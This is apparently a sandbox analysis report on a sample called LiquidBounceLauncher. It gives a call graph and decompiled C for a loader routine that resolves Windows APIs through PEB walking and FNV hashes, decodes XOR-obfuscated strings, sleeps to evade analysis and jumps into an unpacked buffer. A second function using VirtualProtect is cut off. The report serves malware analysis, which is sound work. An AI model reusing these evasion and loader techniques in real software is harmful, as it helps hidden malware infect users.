25665->25666 25667 41544a 25666->25667 25668 40146e VirtualAlloc 25667->25668 25669 415470 25668->25669 25670 40146e VirtualAlloc 25669->25670 25671 415483 25670->25671 25672 40146e VirtualAlloc 25671->25672 25673 4154a6 25672->25673 25674 40146e VirtualAlloc 25673->25674 25675 4154b6 25674->25675 25676 40146e VirtualAlloc 25675->25676 25677 4154d6 25676->25677 25678 40146e VirtualAlloc 25677->25678 25679 4154e6 25678->25679 25679->25525 25681 4a00c7 25680->25681 25681->25554 25683 4d235f 25682->25683 25683->25566 25684 4292c0 FindNextFileA 25685 429342 GetLastError 25684->25685 25687 4292e3 25684->25687 25686 42934c _errno 25685->25686 25685->25687 25688 42b2d0 25689 42b2dc 25688->25689 25690 42b2e9 25689->25690 25691 42b300 fputc 25689->25691 25692 4291f0 FindFirstFileA 25693 42926e _errno GetLastError 25692->25693 25698 429214 25692->25698 25694 4292b2 _errno 25693->25694 25695 429281 _errno 25693->25695 25694->25698 25696 4292a5 _errno 25695->25696 25697 42928e _errno 25695->25697 25696->25698 25697->25698 25699 429298 _errno 25697->25699 25699->25698 25700 431760 fwrite 25701 4af900 25702 4af911 malloc 25701->25702 25704 4af90c 25701->25704 25703 4af91d 25702->25703 25702->25704 25704->25702 25705 4af92f 25704->25705 25706 4af972 malloc 25705->25706 25708 4af96d 25705->25708 25707 4af980 25706->25707 25706->25708 25708->25706 25708->25707

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Function 004B09BC Relevance: 73.8, APIs: 5, Strings: 37, Instructions: 316memorysleepwindowCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      C-Code - Quality: 22%
                                                                                                                                                                                      			E004B09BC(void* __edx, void* __eflags, long long __fp0, char _a4) {
				void* _v24;
				char _v68;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				void _v103;
				char* _v104;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				char _v144;
				char _v145;
				intOrPtr _v164;
				void* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				void* _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				void* _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				long long _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				void* _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				void* _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				void* _v264;
				char* _v268;
				void* _v272;
				char* _v276;
				char* _v280;
				char* _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t203;
				void* _t204;
				intOrPtr _t209;
				signed int _t215;
				int _t221;
				signed int _t223;
				int _t227;
				void* _t230;
				signed int _t234;
				void* _t245;
				void* _t247;
				signed int _t249;
				signed int _t251;
				void* _t253;
				void* _t254;
				signed int _t259;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t271;
				void* _t281;
				signed int _t287;
				intOrPtr _t295;
				void* _t296;
				void* _t297;
				intOrPtr* _t298;
				intOrPtr* _t299;
				void* _t302;
				void* _t306;
				signed int _t312;
				void* _t315;
				void* _t316;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				void** _t324;
				void* _t329;
				long long _t336;

				_t336 = __fp0;
				_t329 = __eflags;
				_t281 = __edx;
				_t256 =  &_a4;
				_t323 = _t322 & 0xfffffff0;
				_t2 = _t256 - 4; // 0xaf734
				_push( *_t2);
				_t320 = _t323;
				_push(_t297);
				_push(_t306);
				_push(_t245);
				_push( &_a4);
				_t324 = _t323 - 0x108;
				L0041FEC0(); // executed
				_t203 = E004104FC(_t329); // executed
				_t204 = _t203 + 0xe9;
				if(_t204 >= 0xffffff66) {
					__eflags = _t204 - 0xffffffa1;
					if(_t204 >= 0xffffffa1) {
						__eflags = _t204 - 0xffffffbd;
						if(_t204 == 0xffffffbd) {
							_v276 = 0;
							_v280 = L"vnjygxprahchwfjlmnkiuuxrcajvawgirfeembxrtwtxfejphlcffejjbyavdfppgkqtjysqbvhihqgh";
							_v284 = L"duxegponltcgfwuwsrlcesbtyclllnbhxrtphwjqqxttjyfcnfcwqbuegapxhvitueruqbsnjxwperntcabikehsbeiwpthjxjhqgomaecxswkxgexmismrsibxknkjvxviguoctjteoxpkkapybvyxlx";
							 *_t324 = 0;
							MessageBoxW(??, ??, ??, ??);
							goto L6;
						}
					} else {
						goto L3;
					}
				} else {
					_v276 = 4;
					_v280 = 0x1000;
					_v284 = 0x69;
					 *_t324 = 0; // executed
					VirtualAlloc(??, ??, ??, ??); // executed
					_t324 = _t324 - 0x10;
					L3:
					_v276 = 4;
					_v280 = 0x1000;
					_v284 = 0x96;
					 *_t324 = 0; // executed
					VirtualAlloc(??, ??, ??, ??); // executed
					L6:
					_t324 = _t324 - 0x10;
				}
				E004159F8( &_v104, _t281); // executed
				L0049BC90(_t245,  &_v68, _t297, _t306, _t320);
				_t298 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				while(1) {
					_t209 =  *((intOrPtr*)(_t298 + 0x18));
					_t247 =  *((intOrPtr*)(_t209 +  *((intOrPtr*)(_t209 + 0x3c)) + 0x78)) + _t209;
					if(_t209 == _t247) {
						goto L19;
					}
					_t259 =  *(_t247 + 0x18);
					_v132 = _t259 - 1;
					_v144 = _t259 * 4 - 4;
					while(_v132 != 0xffffffff) {
						_v136 =  *((intOrPtr*)(_t209 + _v144 +  *((intOrPtr*)(_t247 + 0x20)))) + _t209;
						_t312 = 0x97cfb496;
						while(1) {
							_v136 = _v136 + 1;
							_t262 =  *((intOrPtr*)(_v136 - 1));
							if(_t262 == 0) {
								break;
							}
							_v145 = _t262 - 0x41;
							__eflags = _v145 - 0x19;
							_v140 = _t262;
							if(_v145 <= 0x19) {
								_t263 = _t262 | 0x00000020;
								__eflags = _t263;
								_v140 = _t263;
							}
							_t312 = (_t312 ^ _v140) * 0x1000193;
						}
						_t287 = _v132;
						_v144 = _v144 - 4;
						_t38 = _t287 - 1; // 0xfe
						_t264 = _t38;
						if(_t312 != 0xbf48546d) {
							_v132 = _t264;
							continue;
						}
						FreeConsole(); // executed
						_t299 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
						while(1) {
							_t295 =  *((intOrPtr*)(_t299 + 0x18));
							_t315 =  *((intOrPtr*)(_t295 +  *((intOrPtr*)(_t295 + 0x3c)) + 0x78)) + _t295;
							__eflags = _t295 - _t315;
							if(_t295 == _t315) {
								goto L20;
							}
							_t215 =  *(_t315 + 0x18);
							_t265 = _t215 - 1;
							_v140 = _t215 * 4 - 4;
							while(1) {
								__eflags = _t265 - 0xffffffff;
								if(_t265 == 0xffffffff) {
									goto L20;
								}
								_v132 = 0x26d512e1;
								_t249 =  *((intOrPtr*)(_v140 + _t295 +  *((intOrPtr*)(_t315 + 0x20)))) + _t295;
								__eflags = _t249;
								_v136 = _t249;
								while(1) {
									_v136 = _v136 + 1;
									_t221 =  *((intOrPtr*)(_v136 - 1));
									__eflags = _t221;
									if(_t221 == 0) {
										break;
									}
									_v144 = _t221 - 0x41;
									__eflags = _v144 - 0x19;
									_t251 = _t221;
									if(_v144 <= 0x19) {
										_t223 = _t221 | 0x00000020;
										__eflags = _t223;
										_t251 = _t223;
									}
									_v132 = (_t251 ^ _v132) * 0x1000193;
								}
								_v140 = _v140 - 4;
								__eflags = _v132 - 0x99a70fa4;
								_t253 = _t265 - 1;
								if(_v132 != 0x99a70fa4) {
									_t265 = _t253;
									continue;
								}
								_v132 = _t221;
								_t271 = _t295 + ( *(_t265 + _t265 + _t295 +  *((intOrPtr*)(_t315 + 0x24))) & 0x0000ffff) * 4 +  *((intOrPtr*)(_t315 + 0x1c));
								_t316 =  &_v103;
								_t296 = _t295 +  *_t271;
								Sleep(0x1388); // executed
								_push(_t271);
								_v260 = 0x5b;
								_v264 = 0x77e;
								_v268 =  &E004D2200;
								_v272 = "FrApGUvUXHLjDSRdOAJgcKQpXUEYNXJxPkUpIzMgMJbRRjrhxoccPukGaMTRzmIbvvAuWKvTmRWZQAyXdvAjjvMspG"; // executed
								E00416389(_t296); // executed
								_v104 = 0x67;
								memset( &_v103, _v132, 0x21 << 0);
								_v103 = 0x24;
								_v102 = 0x5d;
								_t227 = 0;
								__eflags = 0;
								_v101 = 0x3b;
								_v100 = 0x30;
								_v99 = 0xe;
								_v98 = 9;
								_v97 = 3;
								_v96 = 8;
								_v95 = 0x10;
								_v94 = 0x14;
								_v93 = 0x3b;
								_v92 = 0x2a;
								_v91 = 0xe;
								_v90 = 4;
								_v89 = 0x15;
								_v88 = 8;
								_v87 = 0x14;
								_v86 = 8;
								_v85 = 1;
								_v84 = 0x13;
								_v83 = 0x49;
								_v82 = 0x29;
								_v81 = 0x22;
								_v80 = 0x33;
								_v79 = 0x3b;
								_v78 = 0x21;
								_v77 = 0x15;
								_v76 = 6;
								_v75 = 0xa;
								_v74 = 2;
								_v73 = 0x10;
								_v72 = 8;
								do {
									 *(_t316 + _t227) =  *(_t316 + _t227) ^ 0x00000067;
									_t227 = _t227 + 1;
									__eflags = _t227 - 0x20;
								} while (_t227 != 0x20);
								_t254 =  &_v128;
								_v272 = _t316;
								_v71 = 0;
								_t302 = _t316;
								E0040146E(_t254, _t254, _t296, _t302, _t316);
								__eflags = 0;
								_push(_t296);
								_v104 = 0x11;
								_t230 = memset(_t302, 0, 7 << 2);
								_v103 = 0x63;
								_v102 = 0x7a;
								_v101 = 0x4d;
								_v100 = 0x67;
								_v99 = 0x25;
								_v98 = 0x3f;
								_v97 = 0x21;
								_v96 = 0x3f;
								_v95 = 0x22;
								_v94 = 0x21;
								_v93 = 0x22;
								_v92 = 0x20;
								_v91 = 0x28;
								_v90 = 0x4d;
								_v89 = 0x50;
								_v88 = 0x61;
								_v87 = 0x61;
								_v86 = 0x5d;
								_v85 = 0x70;
								_v84 = 0x64;
								_v83 = 0x7f;
								_v82 = 0x72;
								_v81 = 0x79;
								_v80 = 0x3f;
								_v79 = 0x74;
								_v78 = 0x69;
								_v77 = 0x74;
								do {
									 *(_t316 + _t230) =  *(_t316 + _t230) ^ 0x00000011;
									_t230 = _t230 + 1;
									__eflags = _t230 - 0x1b;
								} while (_t230 != 0x1b);
								_v272 = _t316;
								_v76 = 0;
								asm("fldz");
								_v268 = 0x2a9;
								_v272 = 0x77e;
								_v276 =  &E004D2200;
								_v164 = 0x4f8d53;
								_v172 = 0x9da0d;
								_v168 = 0;
								_v176 = 0x5a;
								_v180 = 0x9fd3e;
								_v184 = 0x4afc;
								_v192 = 0x8f7a6;
								_v188 = 0;
								_v196 = 0x4e72fa;
								_v200 = 0x74d85d;
								_v208 = 0xfe61;
								_v204 = 0;
								_v212 = 0x12342;
								_v216 = 0xb8bac;
								_v228 = 0x7742;
								_v224 = _t336;
								_v232 = 0xd1;
								_v240 = 0xef44;
								_v236 = 0;
								_v248 = 0x21c5;
								_v244 = 0;
								_v256 = 0x30d;
								_v252 = 0;
								_v264 = 0xa3d70a3d;
								_v260 = 0x40819370;
								E00415EC4(); // executed
								_v268 = 1;
								_v272 = _t254;
								_v276 =  &_v104;
								E004163E9();
								_t234 = E004163CC();
								_v264 = 0x2e;
								_v268 = 0x1a000;
								_v272 = 0x4b7020;
								_v276 = "404864006631164583884887946307737350261444662";
								_v132 = _t234;
								E00415E81(_t296); // executed
								_v260 = 0x7384;
								_v264 = 0x5812;
								_v268 = 0x4b7020;
								_v272 = 0;
								_v276 = _v104;
								 *((intOrPtr*)(_v132 +  &E004D2200))(L0049EB60(_t230, _t254, _t254, _t316)); // executed
								E0049ECB0(_t254,  &_v104, _v104,  &_v104, _t320);
								L0049BC90(_t254, _t254, _v104,  &_v104, _t320);
								__eflags = 0;
								return 0;
							}
							L20:
							_t299 =  *_t299;
						}
					}
					L19:
					_t298 =  *_t298;
				}
			}






















































































































                                                                                                                                                                                      0x004b09bc
                                                                                                                                                                                      0x004b09bc
                                                                                                                                                                                      0x004b09bc
                                                                                                                                                                                      0x004b09bc
                                                                                                                                                                                      0x004b09c0
                                                                                                                                                                                      0x004b09c3
                                                                                                                                                                                      0x004b09c3
                                                                                                                                                                                      0x004b09c7
                                                                                                                                                                                      0x004b09c9
                                                                                                                                                                                      0x004b09ca
                                                                                                                                                                                      0x004b09cb
                                                                                                                                                                                      0x004b09cc
                                                                                                                                                                                      0x004b09cd
                                                                                                                                                                                      0x004b09d3
                                                                                                                                                                                      0x004b09d8
                                                                                                                                                                                      0x004b09dd
                                                                                                                                                                                      0x004b09e7
                                                                                                                                                                                      0x004b0a12
                                                                                                                                                                                      0x004b0a15
                                                                                                                                                                                      0x004b0a3d
                                                                                                                                                                                      0x004b0a40
                                                                                                                                                                                      0x004b0a42
                                                                                                                                                                                      0x004b0a4a
                                                                                                                                                                                      0x004b0a52
                                                                                                                                                                                      0x004b0a5a
                                                                                                                                                                                      0x004b0a61
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b0a61
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b09e9
                                                                                                                                                                                      0x004b09e9
                                                                                                                                                                                      0x004b09f1
                                                                                                                                                                                      0x004b09f9
                                                                                                                                                                                      0x004b0a01
                                                                                                                                                                                      0x004b0a08
                                                                                                                                                                                      0x004b0a0d
                                                                                                                                                                                      0x004b0a17
                                                                                                                                                                                      0x004b0a17
                                                                                                                                                                                      0x004b0a1f
                                                                                                                                                                                      0x004b0a27
                                                                                                                                                                                      0x004b0a2f
                                                                                                                                                                                      0x004b0a36
                                                                                                                                                                                      0x004b0a66
                                                                                                                                                                                      0x004b0a66
                                                                                                                                                                                      0x004b0a66
                                                                                                                                                                                      0x004b0a6c
                                                                                                                                                                                      0x004b0a74
                                                                                                                                                                                      0x004b0a82
                                                                                                                                                                                      0x004b0a85
                                                                                                                                                                                      0x004b0a85
                                                                                                                                                                                      0x004b0a8f
                                                                                                                                                                                      0x004b0a93
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b0a99
                                                                                                                                                                                      0x004b0a9f
                                                                                                                                                                                      0x004b0aa9
                                                                                                                                                                                      0x004b0aaf
                                                                                                                                                                                      0x004b0ac9
                                                                                                                                                                                      0x004b0acc
                                                                                                                                                                                      0x004b0ad1
                                                                                                                                                                                      0x004b0ad1
                                                                                                                                                                                      0x004b0ad7
                                                                                                                                                                                      0x004b0adc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b0afb
                                                                                                                                                                                      0x004b0b01
                                                                                                                                                                                      0x004b0b0b
                                                                                                                                                                                      0x004b0b11
                                                                                                                                                                                      0x004b0b13
                                                                                                                                                                                      0x004b0b13
                                                                                                                                                                                      0x004b0b19
                                                                                                                                                                                      0x004b0b19
                                                                                                                                                                                      0x004b0b25
                                                                                                                                                                                      0x004b0b25
                                                                                                                                                                                      0x004b0ade
                                                                                                                                                                                      0x004b0ae1
                                                                                                                                                                                      0x004b0aee
                                                                                                                                                                                      0x004b0aee
                                                                                                                                                                                      0x004b0af1
                                                                                                                                                                                      0x004b0af3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b0af3
                                                                                                                                                                                      0x004b0b42
                                                                                                                                                                                      0x004b0b4d
                                                                                                                                                                                      0x004b0b5b
                                                                                                                                                                                      0x004b0b5b
                                                                                                                                                                                      0x004b0b65
                                                                                                                                                                                      0x004b0b67
                                                                                                                                                                                      0x004b0b69
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b0b6b
                                                                                                                                                                                      0x004b0b6e
                                                                                                                                                                                      0x004b0b78
                                                                                                                                                                                      0x004b0b7e
                                                                                                                                                                                      0x004b0b7e
                                                                                                                                                                                      0x004b0b81
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b0b89
                                                                                                                                                                                      0x004b0b97
                                                                                                                                                                                      0x004b0b97
                                                                                                                                                                                      0x004b0b99
                                                                                                                                                                                      0x004b0b9c
                                                                                                                                                                                      0x004b0b9c
                                                                                                                                                                                      0x004b0ba2
                                                                                                                                                                                      0x004b0ba5
                                                                                                                                                                                      0x004b0ba7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b0bc3
                                                                                                                                                                                      0x004b0bc9
                                                                                                                                                                                      0x004b0bd0
                                                                                                                                                                                      0x004b0bd3
                                                                                                                                                                                      0x004b0bd5
                                                                                                                                                                                      0x004b0bd5
                                                                                                                                                                                      0x004b0bd8
                                                                                                                                                                                      0x004b0bd8
                                                                                                                                                                                      0x004b0be4
                                                                                                                                                                                      0x004b0be4
                                                                                                                                                                                      0x004b0ba9
                                                                                                                                                                                      0x004b0bb0
                                                                                                                                                                                      0x004b0bb7
                                                                                                                                                                                      0x004b0bba
                                                                                                                                                                                      0x004b0bbc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b0bbc
                                                                                                                                                                                      0x004b0beb
                                                                                                                                                                                      0x004b0bfc
                                                                                                                                                                                      0x004b0bff
                                                                                                                                                                                      0x004b0c02
                                                                                                                                                                                      0x004b0c0b
                                                                                                                                                                                      0x004b0c0d
                                                                                                                                                                                      0x004b0c0e
                                                                                                                                                                                      0x004b0c16
                                                                                                                                                                                      0x004b0c1e
                                                                                                                                                                                      0x004b0c26
                                                                                                                                                                                      0x004b0c2d
                                                                                                                                                                                      0x004b0c3a
                                                                                                                                                                                      0x004b0c3e
                                                                                                                                                                                      0x004b0c40
                                                                                                                                                                                      0x004b0c44
                                                                                                                                                                                      0x004b0c48
                                                                                                                                                                                      0x004b0c48
                                                                                                                                                                                      0x004b0c4a
                                                                                                                                                                                      0x004b0c4e
                                                                                                                                                                                      0x004b0c52
                                                                                                                                                                                      0x004b0c56
                                                                                                                                                                                      0x004b0c5a
                                                                                                                                                                                      0x004b0c5e
                                                                                                                                                                                      0x004b0c62
                                                                                                                                                                                      0x004b0c66
                                                                                                                                                                                      0x004b0c6a
                                                                                                                                                                                      0x004b0c6e
                                                                                                                                                                                      0x004b0c72
                                                                                                                                                                                      0x004b0c76
                                                                                                                                                                                      0x004b0c7a
                                                                                                                                                                                      0x004b0c7e
                                                                                                                                                                                      0x004b0c82
                                                                                                                                                                                      0x004b0c86
                                                                                                                                                                                      0x004b0c8a
                                                                                                                                                                                      0x004b0c8e
                                                                                                                                                                                      0x004b0c92
                                                                                                                                                                                      0x004b0c96
                                                                                                                                                                                      0x004b0c9a
                                                                                                                                                                                      0x004b0c9e
                                                                                                                                                                                      0x004b0ca2
                                                                                                                                                                                      0x004b0ca6
                                                                                                                                                                                      0x004b0caa
                                                                                                                                                                                      0x004b0cae
                                                                                                                                                                                      0x004b0cb2
                                                                                                                                                                                      0x004b0cb6
                                                                                                                                                                                      0x004b0cba
                                                                                                                                                                                      0x004b0cbe
                                                                                                                                                                                      0x004b0cc2
                                                                                                                                                                                      0x004b0cc2
                                                                                                                                                                                      0x004b0cc6
                                                                                                                                                                                      0x004b0cc7
                                                                                                                                                                                      0x004b0cc7
                                                                                                                                                                                      0x004b0ccc
                                                                                                                                                                                      0x004b0ccf
                                                                                                                                                                                      0x004b0cd2
                                                                                                                                                                                      0x004b0cd6
                                                                                                                                                                                      0x004b0cda
                                                                                                                                                                                      0x004b0ce4
                                                                                                                                                                                      0x004b0ce6
                                                                                                                                                                                      0x004b0ce7
                                                                                                                                                                                      0x004b0ceb
                                                                                                                                                                                      0x004b0ced
                                                                                                                                                                                      0x004b0cf1
                                                                                                                                                                                      0x004b0cf5
                                                                                                                                                                                      0x004b0cf9
                                                                                                                                                                                      0x004b0cfd
                                                                                                                                                                                      0x004b0d01
                                                                                                                                                                                      0x004b0d05
                                                                                                                                                                                      0x004b0d09
                                                                                                                                                                                      0x004b0d0d
                                                                                                                                                                                      0x004b0d11
                                                                                                                                                                                      0x004b0d15
                                                                                                                                                                                      0x004b0d19
                                                                                                                                                                                      0x004b0d1d
                                                                                                                                                                                      0x004b0d21
                                                                                                                                                                                      0x004b0d25
                                                                                                                                                                                      0x004b0d29
                                                                                                                                                                                      0x004b0d2d
                                                                                                                                                                                      0x004b0d31
                                                                                                                                                                                      0x004b0d35
                                                                                                                                                                                      0x004b0d39
                                                                                                                                                                                      0x004b0d3d
                                                                                                                                                                                      0x004b0d41
                                                                                                                                                                                      0x004b0d45
                                                                                                                                                                                      0x004b0d49
                                                                                                                                                                                      0x004b0d4d
                                                                                                                                                                                      0x004b0d51
                                                                                                                                                                                      0x004b0d55
                                                                                                                                                                                      0x004b0d59
                                                                                                                                                                                      0x004b0d59
                                                                                                                                                                                      0x004b0d5d
                                                                                                                                                                                      0x004b0d5e
                                                                                                                                                                                      0x004b0d5e
                                                                                                                                                                                      0x004b0d63
                                                                                                                                                                                      0x004b0d68
                                                                                                                                                                                      0x004b0d72
                                                                                                                                                                                      0x004b0d74
                                                                                                                                                                                      0x004b0d7c
                                                                                                                                                                                      0x004b0d84
                                                                                                                                                                                      0x004b0d8b
                                                                                                                                                                                      0x004b0d93
                                                                                                                                                                                      0x004b0d9b
                                                                                                                                                                                      0x004b0da3
                                                                                                                                                                                      0x004b0dab
                                                                                                                                                                                      0x004b0db3
                                                                                                                                                                                      0x004b0dbb
                                                                                                                                                                                      0x004b0dc3
                                                                                                                                                                                      0x004b0dcb
                                                                                                                                                                                      0x004b0dd3
                                                                                                                                                                                      0x004b0ddb
                                                                                                                                                                                      0x004b0de3
                                                                                                                                                                                      0x004b0deb
                                                                                                                                                                                      0x004b0df3
                                                                                                                                                                                      0x004b0dfb
                                                                                                                                                                                      0x004b0e03
                                                                                                                                                                                      0x004b0e07
                                                                                                                                                                                      0x004b0e0f
                                                                                                                                                                                      0x004b0e17
                                                                                                                                                                                      0x004b0e1f
                                                                                                                                                                                      0x004b0e27
                                                                                                                                                                                      0x004b0e2f
                                                                                                                                                                                      0x004b0e37
                                                                                                                                                                                      0x004b0e3f
                                                                                                                                                                                      0x004b0e47
                                                                                                                                                                                      0x004b0e4f
                                                                                                                                                                                      0x004b0e57
                                                                                                                                                                                      0x004b0e5f
                                                                                                                                                                                      0x004b0e63
                                                                                                                                                                                      0x004b0e66
                                                                                                                                                                                      0x004b0e6e
                                                                                                                                                                                      0x004b0e73
                                                                                                                                                                                      0x004b0e7b
                                                                                                                                                                                      0x004b0e83
                                                                                                                                                                                      0x004b0e8b
                                                                                                                                                                                      0x004b0e92
                                                                                                                                                                                      0x004b0e95
                                                                                                                                                                                      0x004b0e9d
                                                                                                                                                                                      0x004b0ea5
                                                                                                                                                                                      0x004b0ead
                                                                                                                                                                                      0x004b0eb5
                                                                                                                                                                                      0x004b0ebd
                                                                                                                                                                                      0x004b0ec5
                                                                                                                                                                                      0x004b0ec9
                                                                                                                                                                                      0x004b0ed0
                                                                                                                                                                                      0x004b0ed8
                                                                                                                                                                                      0x004b0ee2
                                                                                                                                                                                      0x004b0ee2
                                                                                                                                                                                      0x004b0b59
                                                                                                                                                                                      0x004b0b59
                                                                                                                                                                                      0x004b0b59
                                                                                                                                                                                      0x004b0b5b
                                                                                                                                                                                      0x004b0b52
                                                                                                                                                                                      0x004b0b52
                                                                                                                                                                                      0x004b0b52

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual$ConsoleFreeMessageSleep
                                                                                                                                                                                      • String ID: $!$!$"$"$%$($.$404864006631164583884887946307737350261444662$?$?$?$Bw$D$FrApGUvUXHLjDSRdOAJgcKQpXUEYNXJxPkUpIzMgMJbRRjrhxoccPukGaMTRzmIbvvAuWKvTmRWZQAyXdvAjjvMspG$I$M$M$P$Z$]$a$a$c$d$duxegponltcgfwuwsrlcesbtyclllnbhxrtphwjqqxttjyfcnfcwqbuegapxhvitueruqbsnjxwperntcabikehsbeiwpthjxjhqgomaecxswkxgexmismrsibxknkjvxv$g$g$i$i$p$r$t$t$vnjygxprahchwfjlmnkiuuxrcajvawgirfeembxrtwtxfejphlcffejjbyavdfppgkqtjysqbvhihqgh$y$z
                                                                                                                                                                                      • API String ID: 1514456886-2380927637
                                                                                                                                                                                      • Opcode ID: f5853b81e76c5bc433bc7427ab0bf368b12e179a74a72afe6e38e25ae90ac42d
                                                                                                                                                                                      • Instruction ID: f5f7170b8979c7eabd995f4536e577912356358e6a5b58a0420886303c61f5b0
                                                                                                                                                                                      • Opcode Fuzzy Hash: f5853b81e76c5bc433bc7427ab0bf368b12e179a74a72afe6e38e25ae90ac42d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 50F15C70808398CEEB21CFA9C45839EBFF0AF55318F14859ED4946B382C7BD5549CB66
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00415EC4 Relevance: 30.1, APIs: 1, Strings: 16, Instructions: 356memoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 258 415ec4-415f16 259 415f19-415f1f 258->259 260 415f25-415f28 259->260 261 416046-41604a 259->261 264 415f2a-415f38 call 4b09a0 260->264 265 415f3d-415f41 260->265 262 416071-416128 call 476dd0 call 415e3e 261->262 263 41604c-41606c call 4acfc0 call 4aa310 261->263 283 41612c-416134 262->283 282 416381-416388 263->282 264->265 269 415f47-415f50 GetPEB 265->269 270 41603e-416041 265->270 273 415f53-415f67 269->273 270->259 276 416034-416039 273->276 277 415f6d-415f7a 273->277 276->273 278 415f7d-415f80 277->278 278->276 281 415f86-415f96 278->281 284 415f9b-415fa6 281->284 283->283 285 416136-416166 call 40146e 283->285 286 415fa8-415fb5 284->286 287 415fbb-415fce 284->287 294 41616a-416172 285->294 289 415fe0-416032 call 4acfc0 call 4aa310 286->289 290 415fb7-415fb9 286->290 291 415fd0-415fd3 287->291 292 415fd6-415fde 287->292 289->270 290->278 291->292 292->284 294->294 295 416174-41618d call 49eb60 GetPEB 294->295 301 416190-41619e 295->301 303 416255-416257 301->303 304 4161a4-4161b1 301->304 303->301 306 4161b4-4161b7 304->306 306->303 307 4161bd-4161d1 306->307 308 4161d4-4161df 307->308 309 4161e1-4161ef 308->309 310 4161f5-416205 308->310 311 416221-416253 GetPEB 309->311 312 4161f1-4161f3 309->312 313 416210-41621f 310->313 314 416207-41620d 310->314 316 41625e-41626c 311->316 312->306 313->308 314->313 317 41625c 316->317 318 41626e-41627b 316->318 317->316 319 41627e-416281 318->319 319->317 320 416283-416296 319->320 321 416299-4162a4 320->321 322 4162a6-4162b4 321->322 323 4162ba-4162ca 321->323 324 4162e6-416351 VirtualProtect call 420540 322->324 325 4162b6-4162b8 322->325 326 4162d5-4162e4 323->326 327 4162cc-4162d2 323->327 330 416356-41636d call 49bc90 324->330 325->319 326->321 327->326 330->282
                                                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                                                      			E00415EC4(char _a4, char* _a8, signed int _a12, signed int _a24, signed int _a28, signed int _a32, signed int _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a64, char _a80, signed int _a88, signed int _a92, signed int _a116) {
				void* _v16;
				char _v52;
				void _v68;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				void _v79;
				char _v80;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				char _v141;
				signed int _v148;
				char _v160;
				char _v164;
				intOrPtr _v168;
				void* _v172;
				signed int _v176;
				char _v184;
				void* _v188;
				void* _v192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				void* _t235;
				void* _t239;
				void* _t243;
